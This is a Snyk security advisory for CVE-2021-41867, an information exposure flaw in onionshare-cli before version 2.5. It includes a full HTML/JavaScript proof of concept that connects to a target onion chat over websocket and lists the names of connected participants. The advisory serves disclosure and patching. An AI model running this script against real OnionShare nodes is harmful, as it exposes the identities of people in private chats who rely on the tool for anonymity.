Information Exposure Affecting onionshare-cli package, versions [0,2.5)


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.24% (65th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-PYTHON-ONIONSHARECLI-1924551
  • published21 Nov 2021
  • disclosed19 Nov 2021
  • creditd0td0tslash

Introduced: 19 Nov 2021

CVE-2021-41867  (opens in a new tab)
CWE-200  (opens in a new tab)

How to fix?

Upgrade onionshare-cli to version 2.5 or higher.

Overview

onionshare-cli is a software that lets you securely and anonymously send and receive files. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable web address so others can download files from you, or upload files to you. It does not require setting up a separate server or using a third party file-sharing service.

Affected versions of this package are vulnerable to Information Exposure via the chat_mode.py file, which allows remote unauthenticated attackers to connect via websocket and to retrieve the full list of participants of a non-public OnionShare node via the --chat feature. The leak of chat participants happened when emitting joined message in the websocket channel.

###PoC

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
  </head>
  <body>
    <h1>OnionShare Disclosure of Connected Users PoC</h1>
    <ul id="user-list"></ul>
    <script src="https://cdn.socket.io/3.1.1/socket.io.min.js" crossorigin="anonymous">
    </script>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js">
    </script>
    <script> 
      $(function () {
        $(document).ready(function () {
          var socket = io.connect(
            'http://<target Onion v3 address>.onion/chat',
            {
              transports: ['websocket']
            }
          );
          socket.on('connect', function () {
            socket.emit('joined', {
            }
           );
          }
         );
          socket.on('status', function (data) {
            var userListHTML = '';
            var userslist = data.connected_users;
            for (i = 0; i < userslist.length; i++) {
              userListHTML += `<li>${userslist[i]}</li>`;
            }
            $('#user-list').html(userListHTML);
          }
         );
        }
       );
      }
       );
    </script>
  </body>
</html>

CVSS Scores

version 3.1